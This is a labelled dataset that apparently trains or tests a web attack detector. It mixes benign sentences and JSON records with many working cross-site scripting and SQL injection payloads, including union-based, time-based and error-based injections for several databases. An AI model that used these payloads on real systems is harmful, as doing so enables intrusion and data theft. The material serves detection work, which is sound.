"<rtc draggable=""true"" ondrag=""alert(1)"">test</rtc>",1,XSS,5561 "{""id"":null,""firstName"":""Reign"",""lastName"":""Hc"",""address"":""177 MAIN STREET, LITTLETON NH 03561"",""city"":""654"",""telephone"":""2908989161""}",3,normal,27408 "<wbr oncontextmenu=""alert(1)"">test</wbr>",1,XSS,7863 "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))#",2,SQLi,11051 <textarea autofocus onfocusin=alert(1)>test</textarea>,1,XSS,4702 "<STYLE type=""text/css"">BODY{background:url(""javascript:alert('')"")}</STYLE>",1,XSS,2235 Select your stumble.,3,normal,25023 "select * from users where id = 1 or ""& ) "" or 1 = 1 -- 1",2,SQLi,17584 "-3805"" ) ) ) union all select 9123,9123,9123,9123,9123,9123,9123,9123#",2,SQLi,16184 "-6457 where 1764 = 1764 union all select 1764,1764,1764,1764,1764,1764,1764,1764--",2,SQLi,15116 "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))--",2,SQLi,11950 1%' and sleep ( 5 ) and '%' = ',2,SQLi,20440 "<u onmousedown=""alert(1)"">test</u>",1,XSS,9218 "1 ) and elt ( 3138 = 1817,1817 )",2,SQLi,20321 1' where 8635 = 8635 order by 1--,2,SQLi,20218 "<dd draggable=""true"" ondragend=""alert(1)"">test</dd>",1,XSS,5426 select ( case when ( 6652 = 1932 ) then 6652 else 6652* ( select 6652 from information_schema.character_sets ) end ) #,2,SQLi,13289 "select * from users where id = 1 or 1#""1 union select null,version ( ) -- 1",2,SQLi,15591 "1' ) ) ) and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( ( ( 'ofko' = 'ofko",2,SQLi,12525 "<span oncontextmenu=""alert(1)"">test</span>",1,XSS,7495 Check values where needed.,3,normal,23371 "<dl onmouseout=""alert(1)"">test</dl>",1,XSS,8998 "<style>@keyframes x{}</style><aside style=""animation-name:x"" onanimationstart=""alert(1)""></aside>",1,XSS,1552 "1"" and make_set ( 4214 = 9503,9503 ) and ""phjg"" like ""phjg",2,SQLi,17417 "select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3#",2,SQLi,14866 "1' ) as ljpy where 8270 = 8270 or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) --",2,SQLi,10953 "-8002' ) ) ) union all select 6647,6647,6647--",2,SQLi,18920 <figcaption onpointerleave=alert(1)>XSS</figcaption>,1,XSS,5097 "-4327"" or make_set ( 3107 = 1781,1781 ) and ""lclf"" like ""lclf",2,SQLi,17056 "<source onbeforepaste=""alert(1)"" contenteditable>test</source>",1,XSS,3245 "1%"" or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ""%"" = """,2,SQLi,11078 "<style>:target {transform: rotate(180deg);}</style><u id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></u>",1,XSS,729 "select * from users where id = 1 or \.<\ union select 1,@@VERSION -- 1",2,SQLi,16149 "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28",2,SQLi,14615 <x onmousedown=alert(1)>click this!,1,XSS,9136 "<mark ondblclick=""alert(1)"">test</mark>",1,XSS,8172 "<style>@keyframes slidein {}</style><noembed style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></noembed>",1,XSS,333 <iframe onpointerenter=alert(1)>XSS</iframe>,1,XSS,7030 "1 ) as ekgx where 9923 = 9923 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,13833 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><track id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></track>",1,XSS,213 "Facebook pays select partners, including Mashable, to create live videos.",3,normal,26203 <progress onfocusout=alert(1) tabindex=1 id=x></progress><input autofocus>,1,XSS,2265 "<dialog oncontextmenu=""alert(1)"">test</dialog>",1,XSS,6345 "Select ""New Game,"" then ""Knee Deep in the Dead"" and select your preferred difficulty.",3,normal,25678 "-4304' where 1005 = 1005 union all select 1005,1005#",2,SQLi,18189 "1%' and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11391 "<small onbeforepaste=""alert(1)"" contenteditable>test</small>",1,XSS,3545 "<style>:target {color:red;}</style><s id=x style=""transition:color 1s"" ontransitionend=alert(1)></s>",1,XSS,1440 "1 ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) -- huss",2,SQLi,10731 1'|| ( select 'oxas' from dual where 8284 = 8284 or sleep ( 5 ) ) ||',2,SQLi,16275 "-9054"" ) as rgyu where 3792 = 3792 order by 1--",2,SQLi,18842 Modify the privacy controls.,3,normal,22748 "<mark onkeydown=""alert(1)"" contenteditable>test</mark>",1,XSS,4794 <u onpointerout=alert(1)>XSS</u>,1,XSS,9423 She'll select her jewelry.,3,normal,24335 ORDER BY 21#,2,SQLi,22315 "-5963"" or 9323 = 9323#",2,SQLi,21550 "<script oncontextmenu=""alert(1)"">test</script>",1,XSS,6477 "*/alert(1)"">'onload=""/*<svg/1='",1,XSS,9509 "1%' ) ) ) and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,18826 "<div draggable=""true"" contenteditable>drag me</div><center ondragover=alert(1) contenteditable>drop here</center>",1,XSS,922 "1"" and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,12195 "1' ) as ohcs where 9588 = 9588 or elt ( 6272 = 6272,sleep ( 5 ) ) --",2,SQLi,16420 "<pre draggable=""true"" ondragend=""alert(1)"">test</pre>",1,XSS,4870 "<style>:target {color: red;}</style><button id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></button>",1,XSS,820 "-9937' ) ) union all select 3900,3900,3900,3900,3900,3900,3900,3900,3900#",2,SQLi,15896 "1 ) where 6082 = 6082 and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) --",2,SQLi,11000 "=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23",2,SQLi,9900 "<style>@keyframes slidein {}</style><td style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></td>",1,XSS,455 "<rtc onclick=""alert(1)"">test</rtc>",1,XSS,9244 </script>,1,XSS,9851 "<plaintext oncut=""alert(1)"" contenteditable>test</plaintext>",1,XSS,3459 Select a topic for a blog post.,3,normal,24087 You can select to route using toll roads or avoiding them.,3,normal,25080 Please select a song.,3,normal,24340 "Simply select a friend, press the Bitmoji button on the far right side under the text box, and select the sticker you want to send.",3,normal,25552 Where's the golf course?,3,normal,23607 "<style>:target {color:red;}</style><details id=x style=""transition:color 1s"" ontransitionend=alert(1)></details>",1,XSS,942 "<progress onbeforepaste=""alert(1)"" contenteditable>test</progress>",1,XSS,2741 "1' ) where 1363 = 1363 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,11820 "<body src=1 href=1 onerror=""javascript:alert(1)""></body>",1,XSS,4198 1 where 9872 = 9872,2,SQLi,21932 admin') or '1'='1'#,2,SQLi,21906 "{""id"":null,""firstName"":""April"",""lastName"":""Kwan"",""address"":""732 W 2ND ST, TIFTON GA 31794"",""city"":""616"",""telephone"":""1196822191""}",3,normal,26995 <textarea id=x tabindex=1 onactivate=alert(1)></textarea>,1,XSS,4073 "1%' ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( '%' = '",2,SQLi,17808 He selected a color for his new bedroom.,3,normal,23793 "<del onmouseenter=""alert(1)"">test</del>",1,XSS,8225 <abbr onpointerover=alert(1)>XSS</abbr>,1,XSS,8126 <picture onpointerleave=alert(1)>XSS</picture>,1,XSS,6365 select ( case when ( 2161 = 4328 ) then 2161 else 2161* ( select 2161 from mysql.db ) end ) #,2,SQLi,14474 "<LINK REL=""stylesheet"" HREF=""http://.rocks/.css"">",1,XSS,5798 "<keygen draggable=""true"" ondragend=""alert(1)"">test</keygen>",1,XSS,3679 "<bdo onmouseup=""alert(1)"">test</bdo>",1,XSS,8867 That lets you select a charity and then donates 0.5 percent of the purchase price of select products to the charity you picked.,3,normal,25496 select * from myfile;copy myfile to /tmp/test;,2,SQLi,18985 The Oogie Boogie Bash is offered on select nights between Sept.,3,normal,25407 "<i onbeforepaste=""alert(1)"" contenteditable>test</i>",1,XSS,5190 "1' in boolean mode ) or elt ( 6272 = 6272,sleep ( 5 ) ) #",2,SQLi,17516 "-9256"" ) ) union all select 2977,2977,2977,2977,2977,2977,2977--",2,SQLi,16800 "1' where 1673 = 1673 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --",2,SQLi,10332 <cite id=x tabindex=1 onbeforedeactivate=alert(1)></cite><input autofocus>,1,XSS,2264 -6567' ) ) union all select 3217#,2,SQLi,20216 or 0=0 --,2,SQLi,22444 "-8797"" ) ) order by 1#",2,SQLi,21511 "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23",2,SQLi,13210 "<style>@keyframes x{}</style><rt style=""animation-name:x"" onanimationend=""alert(1)""></rt>",1,XSS,1781 <br id=x tabindex=1 onbeforedeactivate=alert(1)></br><input autofocus>,1,XSS,2555 "{""id"":null,""name"":""finest""}",3,normal,27494 "<blockquote draggable=""true"" ondragend=""alert(1)"">test</blockquote>",1,XSS,2688 "<style>:target {color: red;}</style><pre id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></pre>",1,XSS,1042 "Select Comfort – Select Comfort lost two cents per share for its latest quarter, compared to consensus estimates of a five cents per share profit.",3,normal,25642 "-3361 where 1335 = 1335 or elt ( 5891 = 5092,5092 ) --",2,SQLi,17971 "-2876"" ) or make_set ( 5306 = 6127,6127 ) and ( ""urjm"" = ""urjm",2,SQLi,16963 "<isindex draggable=""true"" ondragenter=""alert(1)"">test</isindex>",1,XSS,3073 "<iframe onmouseup=""alert(1)"">test</iframe>",1,XSS,7532 1'|| ( select 'yzdz' where 5021 = 5021,2,SQLi,19722 1' ) ) and ( 7517 = 3423 ) *3423 and ( ( 'aenz' = 'aenz,2,SQLi,17836 <image onpointerdown=alert(1)>XSS</image>,1,XSS,7769 "1 ) ) as sxhg where 7697 = 7697 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11069 1' ) ) and ( 3020 = 3020 ) *6703 and ( ( 'pfal' = 'pfal,2,SQLi,17824 "-9858"" or 8592 = 8553",2,SQLi,21639 "select * from users where id = 1 + ( $+ ) union select null,@@VERSION -- 1",2,SQLi,15706 I want to choose a restaurant for a special occasion.,3,normal,23950 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#",2,SQLi,15687 "1"" ) or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,15152 or '1'='1'--,2,SQLi,22275 <embed onpointerout=alert(1)>XSS</embed>,1,XSS,7964 "<embed onmouseover=""alert(1)"">test</embed>",1,XSS,7402 "Because when they came in to select ideas, they were looking for reasons to say no.",3,normal,26334 Select assist.,3,normal,24741 "select sleep ( 5 ) and ( ( ( ""zlal"" = ""zlal",2,SQLi,19248 "1%"" ) ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( ""%"" = """,2,SQLi,10327 "Before you can select a baby corsage, to make you need to consider several factors.",3,normal,26332 <button form=test onformchange=alert(1)>//INJECTX,1,XSS,5841 "<a href=""\xE3\x80\x80javascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2026 Select the right tool for the task.,3,normal,24134 ? or 1 = 1 --,2,SQLi,22263 "<tt onmouseout=""alert(1)"">test</tt>",1,XSS,9022 "1%"" ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ""%"" = """,2,SQLi,10918 "-5202 union all select 5332,5332,5332,5332,5332,5332,5332#",2,SQLi,17421 "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#",2,SQLi,14855 "<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script>",1,XSS,30 URL=javascript:alert(''),1,XSS,9721 "<style>@keyframes slidein {}</style><figure style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></figure>",1,XSS,357 "<article onbeforecut=""alert(1)"" contenteditable>test</article>",1,XSS,3172 1' or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) and 'ejdk' like 'ejdk,2,SQLi,15407 "select * from users where id = 1 or ""] ) "" or 1 = 1 -- 1",2,SQLi,17604 "-5702' ) ) ) union all select 7806,7806,7806,7806,7806--",2,SQLi,17724 "{""id"":null,""name"":""layers""}",3,normal,27035 <table id=x tabindex=1 onfocusin=alert(1)></table>,1,XSS,5645 -3666' ) where 6386 = 6386 union all select 6386--,2,SQLi,18484 <option id=x tabindex=1 onbeforeactivate=alert(1)></option>,1,XSS,3677 "select * from users where id = 1 or ( \. ) = 1 union select 1,@@VERSION -- 1",2,SQLi,15474 "-7528' or make_set ( 3809 = 1821,1821 ) and 'kgch' = 'kgch",2,SQLi,17372 "1 or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,13787 "<SCRIPT/XSS SRC=""http://google.com""></SCRIPT>",1,XSS,6752 "javascript:alert();//</title></noscript></noembed></template></style></textarea><frameset onload='+/""/+/[*/[]/+alert()//'-->\"" alert();/*`/**/(/**/alert())//<script>alert()</script><<svg onload=alert()>>",1,XSS,122 <noembed onpointerout=alert(1)>XSS</noembed>,1,XSS,6797 1' ) and 4595 = 4595#,2,SQLi,21588 "<div draggable=""true"" ondrag=""alert(1)"">test</div>",1,XSS,5581 "select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 and ( ( 'wusq' = 'wusq",2,SQLi,13707 "<style>@keyframes slidein {}</style><element style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></element>",1,XSS,330 "<nobr onkeydown=""alert(1)"" contenteditable>test</nobr>",1,XSS,4712 <map id=x tabindex=1 onbeforedeactivate=alert(1)></map><input autofocus>,1,XSS,2372 <track id=x tabindex=1 onfocusin=alert(1)></track>,1,XSS,5524 <ol id=x tabindex=1 onbeforedeactivate=alert(1)></ol><input autofocus>,1,XSS,2546 "select count ( * ) from generate_series ( 1,5000000 ) and ( 'qpdu' = 'qpdu",2,SQLi,15815 "1' ) as jiic where 6158 = 6158 or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) --",2,SQLi,11101 Select your examine.,3,normal,24994 "1 or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) # vojr",2,SQLi,10895 "1%"" ) ) ) waitfor delay '0:0:5' and ( ( ( ""%"" = """,2,SQLi,18586 <big id=x tabindex=1 onbeforeactivate=alert(1)></big>,1,XSS,4900 "<main draggable=""true"" ondrag=""alert(1)"">test</main>",1,XSS,5155 "<style>:target {color:red;}</style><nobr id=x style=""transition:color 1s"" ontransitionend=alert(1)></nobr>",1,XSS,1211 "1%' or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and '%' = '",2,SQLi,13386 "1"" ) union all select null,null,null#",2,SQLi,19885 "1' ) ) and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,13092 Let's choose a gift for the special occasion.,3,normal,23733 "<script src=data:text/javascript;base64,YWxlcnQoMSk=></script>",1,XSS,3125 <;IMG RC=&;#0000106&;#0000097&;#0000118&;#0000097&;#0000115&;#0000099&;#0000114&;#0000105&;#0000112&;#0000116&;#0000058&;#0000097&;#0000108&;#0000101&;#0000114&;#0000116&;#0000040&;#0000039&;#0000088&;#0000083&;#0000083&;#0000039&;#0000041>;,1,XSS,80 1'+ ( select 'tjvt' where 2463 = 2463,2,SQLi,19873 People can select more than one race.,3,normal,25788 "1 where 2674 = 2674 and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,13036 "For starters, you'll get Priority Pass Select airport lounge membership.",3,normal,26177 <button onCopy=javascript:alert(1)>,1,XSS,9140 La La Land is currently in limited release in select cities.,3,normal,25920 Select gain.,3,normal,24775 ORDER BY 1#,2,SQLi,22359 Where's the massage parlor?,3,normal,23623 "{""id"":null,""firstName"":""Chan"",""lastName"":""Sung"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27263 "<>""'%; ) ( &+",2,SQLi,22272 -9311 ) ) or ( 5065 = 2572 ) *2572 and ( ( 1199 = 1199,2,SQLi,17969 "<sub draggable=""true"" ondragend=""alert(1)"">test</sub>",1,XSS,4871 "-6377'|| ( select 'ryin' where 2113 = 2113 union all select 2113,2113,2113#",2,SQLi,15629 "1' ) or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( 'obmu' = 'obmu",2,SQLi,14509 <progress onpointermove=alert(1)>XSS</progress>,1,XSS,6215 "<style>@keyframes x{}</style><br style=""animation-name:x"" onanimationend=""alert(1)""></br>",1,XSS,1784 <caption onpointerout=alert(1)>XSS</caption>,1,XSS,6988 "1 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) # fzni",2,SQLi,13299 1 ) as jvmv where 3857 = 3857 and ( 5717 = 6483 ) *6483--,2,SQLi,17503 "<plaintext onmousedown=""alert(1)"">test</plaintext>",1,XSS,5546 "&quot;&gt;&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(&quot;XSS&quot;)&gt;",1,XSS,1948 "As it would be impossible within the limits of this article to illustrate or explain adequately the applications which have been made of the principles of thermodynamics, it has been necessary to select such illustrations only as are required for other reasons, or could not be found elsewhere.",3,normal,26354 "This week, we select kumquats, pears, and a mushroom assortment.",3,normal,25298 "1 and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) -- kvkk",2,SQLi,17085 by,3,normal,23126 "<;/TITLE>;<;SCRIPT>;alert(""XSS"");<;/SCRIPT>;",1,XSS,6792 "<div draggable=""true"" contenteditable>drag me</div><tt ondrop=alert(1) contenteditable>drop here</tt>",1,XSS,1394 -9541 where 4291 = 4291 or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --,2,SQLi,10685 "1 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) -- rlas",2,SQLi,17160 "<object onmouseenter=""alert(1)"">test</object>",1,XSS,6697 "1 ) ) or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ( 8475 = 8475",2,SQLi,12004 "<output onbeforepaste=""alert(1)"" contenteditable>test</output>",1,XSS,3217 "onfocus=alert(document.domain) > <""",1,XSS,8992 "1 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )",2,SQLi,12428 "-4522"" ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ""mbkq"" = ""mbkq",2,SQLi,9993 -2745 ) ) as aywp where 9735 = 9735 or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --,2,SQLi,12329 "<style>@keyframes x{}</style><rb style=""animation-name:x"" onanimationend=""alert(1)""></rb>",1,XSS,1772 "-8544%"" or 6872 = 6872 and ""%"" = """,2,SQLi,20169 Insert your passport details.,3,normal,22621 "1 ) ) as wezj where 2869 = 2869 and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) --",2,SQLi,10936 "1'+ ( select 'sqje' where 1634 = 1634 or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) ) +'",2,SQLi,11699 <menuitem id=x tabindex=1 onbeforeactivate=alert(1)></menuitem>,1,XSS,3024 "<span oncopy=""alert(1)"" contenteditable>test</span>",1,XSS,5403 <meta onpointerenter=alert(1)>XSS</meta>,1,XSS,7859 "1' ) as fyuh where 7608 = 7608 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --",2,SQLi,10124 "<a oncut=""alert(1)"" contenteditable>test</a>",1,XSS,6878 "-7295"" ) or 9323 = 9323#",2,SQLi,21218 select ( case when ( 2132 = 8969 ) then 1 else 2132* ( select 2132 from master..sysdatabases ) end ) --,2,SQLi,13980 "<kbd onbeforecopy=""alert(1)"" contenteditable>test</kbd>",1,XSS,4621 ) or ( a = a,2,SQLi,22334 "<em onmouseenter=""alert(1)"">test</em>",1,XSS,8722 </title><script>alert(/xss/)</script>,1,XSS,8561 ORDER BY 12#,2,SQLi,22306 "1' or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )",2,SQLi,14314 "1 where 6119 = 6119 or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,12540 <i id=x tabindex=1 onfocus=alert(1)></i>,1,XSS,7971 "1%"" ) ) ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( ( ""%"" = """,2,SQLi,12478 1%' ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( '%' = ',2,SQLi,10676 "<option onmouseover=""alert(1)"">test</option>",1,XSS,6828 "1' ) ) and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( 'pydi' like 'pydi",2,SQLi,10135 "1"" ) ) as nbdc where 4444 = 4444 union all select null,null--",2,SQLi,17109 AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#,2,SQLi,19161 <code onpointerdown=alert(1)>XSS</code>,1,XSS,8162 -3125' ) ) ) order by 1#,2,SQLi,21204 <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>,1,XSS,4425 "1'+ ( select 'opqr' where 2442 = 2442 or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12183 "<legend onmousedown=""alert(1)"">test</legend>",1,XSS,6865 "<option onmousemove=""alert(1)"">test</option>",1,XSS,6989 >><script>alert('XSS')</script>,1,XSS,9493 ( select * from ( select ( sleep ( 5 ) ) ) srmq ) and ( 'kerg' like 'kerg,2,SQLi,15871 "When you select bath towels, consider the color and style of the bathroom where they will be used.",3,normal,25150 "<track onmouseenter=""alert(1)"">test</track>",1,XSS,7285 <map onfocusout=alert(1) tabindex=1 id=x></map><input autofocus>,1,XSS,2928 <x </onxxx=1,1,XSS,9828 javascript:x='%27-alert(1)-%27';,1,XSS,9482 <sub onpointermove=alert(1)>XSS</sub>,1,XSS,8736 Let's find out where the nearest gas station is.,3,normal,23842 "-2059%"" or elt ( 4587 = 3101,3101 ) and ""%"" = """,2,SQLi,18836 "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#",2,SQLi,16898 "<a href=""\xE2\x80\x89javascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2015 index,3,normal,23117 "<map onpaste=""alert(1)"" contenteditable>test</map>",1,XSS,5679 "><script+src=http://api.m.sm.cn/rest?method=tools.sider&callback=jsonp_1869510867%3balert(1)%2f%2f794""></script>",1,XSS,949 "-5014%"" ) ) ) or 3348 = 2430--",2,SQLi,20611 "<STYLE>.{background-image:url(""javascript:alert('')"");}</STYLE><A CLASS=></A>",1,XSS,2149 "<meta onclick=""alert(1)"">test</meta>",1,XSS,8791 1 ) ) as oqui where 3368 = 3368 order by 1--,2,SQLi,19113 "<title onmouseleave=""alert(1)"">test</title>",1,XSS,7132 "iif ( 1718 = 5436,1,1/0 )",2,SQLi,21144 "Previously, you'd need to select each app one by one.",3,normal,25767 url(javascript:alert('')),1,XSS,9702 "Roebuck, for the appointment of a select committee to enquire into the conduct of the war, was carried in the House of Commons by a.",3,normal,25746 "1' ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users )",2,SQLi,10979 <spacer onpointerleave=alert(1)>XSS</spacer>,1,XSS,6844 "1 ) where 7775 = 7775 union all select null,null,null,null--",2,SQLi,17218 "A select few, however, collect shoes — lots of them.",3,normal,26423 -5389'|| ( select 'gggl' where 1020 = 1020 union all select 1020#,2,SQLi,16720 "&lt;SPAN DATASRC=\""#xss\"" DATAFLD=\""B\"" DATAFORMATAS=\""HTML\""&gt;&lt;/SPAN&gt;",1,XSS,2075 <BODY ONLOAD=alert('')>,1,XSS,9733 I picked some fresh herbs from the backyard.,3,normal,23820 Where's the bus stop?,3,normal,23503 <blink onpointerover=alert(1)>XSS</blink>,1,XSS,7737 "<div draggable=""true"" contenteditable>drag me</div><option ondragover=alert(1) contenteditable>drop 